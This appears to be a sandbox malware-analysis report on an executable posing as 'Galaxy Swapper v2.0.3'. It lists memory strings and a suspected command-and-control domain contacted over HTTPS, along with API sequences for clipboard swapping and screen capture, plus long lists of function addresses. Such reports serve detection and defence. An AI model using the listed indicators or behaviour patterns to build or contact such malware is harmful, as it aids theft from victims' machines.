Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1041113681.000000000151E000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1043714845.000000000147C000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1095849141.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1039688055.000000000151E000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.984625942.0000000001523000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1072728256.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1126897158.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000002.2174986889.0000000001525000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1040455413.000000000151E000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000002.2174693696.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1072728256.000000000151E000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1755014945.00000000014EE000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1754730788.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1041219411.000000000151E000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1126489839.0000000001523000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.958958687.0000000001523000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1042796407.000000000151E000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1045589394.000000000151E000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1039010637.000000000151E000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1039227139.000000000151E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJIS
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJIS:1
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1755134255.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1754952963.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000002.2174505768.00000000014CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJIS:2
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1072728256.00000000014F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJIS::
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.984625942.0000000001523000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.985846572.000000000151A000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.986063272.000000000151A000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.985574597.000000000151A000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.984899629.0000000001509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISAAAA
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISB0
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1095849141.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1126897158.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISG:
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.958958687.0000000001523000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISH
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.984625942.0000000001523000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.958958687.0000000001523000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISs
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1077676110.00000000014E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/l
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1755160197.0000000001464000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1126504400.0000000001463000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000002.2174098985.0000000001466000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet:443/gdJIS
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000002.2174098985.0000000001466000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1043714845.0000000001463000.00000004.00000020.00020000.00000000.sdmp, Galaxy Swapper v2.0.3.exe, 00000001.00000003.1045468538.0000000001463000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet:443/gdJISocal
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012637026.000000000151B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012637026.000000000151B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012637026.000000000151B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012292778.0000000003ED3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012292778.0000000003ED3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012637026.000000000151B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.958436840.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012637026.000000000151B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012292778.0000000003ED3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012292778.0000000003ED3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012292778.0000000003ED3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012292778.0000000003ED3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Galaxy Swapper v2.0.3.exe, 00000001.00000003.1012292778.0000000003ED3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49681 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49687 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49692 version: TLS 1.2

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Code function: 1_2_0043F560 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

1_2_0043F560

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Code function: 1_2_03AB1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

1_2_03AB1000

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Code function: 1_2_0043F560 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

1_2_0043F560

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe

Code function: 1_2_0043F710 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

1_2_0043F710

Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F031F0	0_2_00F031F0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F03640	0_2_00F03640
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F300D0	0_2_00F300D0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F058A0	0_2_00F058A0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F1E0A0	0_2_00F1E0A0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F08090	0_2_00F08090
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F10890	0_2_00F10890
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F23890	0_2_00F23890
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F31890	0_2_00F31890
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F04080	0_2_00F04080
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F2D080	0_2_00F2D080
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F06070	0_2_00F06070
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F2F060	0_2_00F2F060
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F14040	0_2_00F14040
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F1A820	0_2_00F1A820
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F19020	0_2_00F19020
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F2A020	0_2_00F2A020
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F33813	0_2_00F33813
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F1C010	0_2_00F1C010
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F01000	0_2_00F01000
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F1B1E0	0_2_00F1B1E0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F2F9B0	0_2_00F2F9B0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F16180	0_2_00F16180
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F0E170	0_2_00F0E170
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F33160	0_2_00F33160
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F04940	0_2_00F04940
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F1C940	0_2_00F1C940
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F32920	0_2_00F32920
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F20110	0_2_00F20110
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F29100	0_2_00F29100
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F4C908	0_2_00F4C908
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F2F2E0	0_2_00F2F2E0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F0F2D0	0_2_00F0F2D0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F152C0	0_2_00F152C0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F29AB0	0_2_00F29AB0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F0EAA0	0_2_00F0EAA0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F14290	0_2_00F14290
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F02280	0_2_00F02280
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F28A50	0_2_00F28A50
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F36A54	0_2_00F36A54
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F05220	0_2_00F05220
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F09220	0_2_00F09220
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F25220	0_2_00F25220
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F20A10	0_2_00F20A10
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F26A00	0_2_00F26A00
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F28200	0_2_00F28200
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F173F0	0_2_00F173F0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F1F3D0	0_2_00F1F3D0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F1ABA0	0_2_00F1ABA0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F06390	0_2_00F06390
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F13390	0_2_00F13390
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F1FB70	0_2_00F1FB70
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F21370	0_2_00F21370
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F20350	0_2_00F20350
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F08340	0_2_00F08340
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F2EB40	0_2_00F2EB40
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F0C310	0_2_00F0C310
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F0B300	0_2_00F0B300
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F1CCE0	0_2_00F1CCE0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F0E4C0	0_2_00F0E4C0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F13CC0	0_2_00F13CC0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F054A0	0_2_00F054A0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F10490	0_2_00F10490
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F33C90	0_2_00F33C90
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F06C80	0_2_00F06C80
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F16480	0_2_00F16480
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F25480	0_2_00F25480
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F32480	0_2_00F32480
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F33477	0_2_00F33477
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F25C60	0_2_00F25C60
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F28450	0_2_00F28450
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F02C40	0_2_00F02C40
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F1EC40	0_2_00F1EC40
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F28C40	0_2_00F28C40
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F05C20	0_2_00F05C20
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F41420	0_2_00F41420
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F3B41A	0_2_00F3B41A
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F2F5D0	0_2_00F2F5D0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F335C0	0_2_00F335C0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F155B0	0_2_00F155B0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F2EDB0	0_2_00F2EDB0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F09580	0_2_00F09580
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F2DD80	0_2_00F2DD80
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F1D560	0_2_00F1D560
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F1DD50	0_2_00F1DD50
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F2FD50	0_2_00F2FD50
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F18540	0_2_00F18540
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F07D30	0_2_00F07D30
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F0F530	0_2_00F0F530
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F0AD30	0_2_00F0AD30
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F19500	0_2_00F19500
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F126F0	0_2_00F126F0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F31EF0	0_2_00F31EF0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F1C6A0	0_2_00F1C6A0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F12E90	0_2_00F12E90
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F28690	0_2_00F28690
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F32E90	0_2_00F32E90
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F2B680	0_2_00F2B680
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F04660	0_2_00F04660
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F17E50	0_2_00F17E50
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F08640	0_2_00F08640
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F16E40	0_2_00F16E40
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F1B630	0_2_00F1B630
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F29630	0_2_00F29630
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F17620	0_2_00F17620
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F10E20	0_2_00F10E20
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F30620	0_2_00F30620
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F09FF0	0_2_00F09FF0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F067D0	0_2_00F067D0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F01790	0_2_00F01790
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F16790	0_2_00F16790
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F0B780	0_2_00F0B780
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F20F80	0_2_00F20F80
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F4E782	0_2_00F4E782
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F1FF70	0_2_00F1FF70
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F0E730	0_2_00F0E730
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F19720	0_2_00F19720
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 0_2_00F29F00	0_2_00F29F00
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0044D850	1_2_0044D850
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00448860	1_2_00448860
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00444080	1_2_00444080
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00430100	1_2_00430100
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00421210	1_2_00421210
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0040BA80	1_2_0040BA80
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00428340	1_2_00428340
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0041F398	1_2_0041F398
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0042C440	1_2_0042C440
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00437437	1_2_00437437
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0041ECE8	1_2_0041ECE8
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0044CD60	1_2_0044CD60
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0041B510	1_2_0041B510
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0041559E	1_2_0041559E
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0041EE5A	1_2_0041EE5A
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_004446D0	1_2_004446D0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00416FD0	1_2_00416FD0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00401040	1_2_00401040
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00446860	1_2_00446860
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_00433820	1_2_00433820
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_004110D0	1_2_004110D0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0044C0E0	1_2_0044C0E0
Source: C:\Users\user\Desktop\Galaxy Swapper v2.0.3.exe	Code function: 1_2_0041C0B8	1_2_0041C0B8
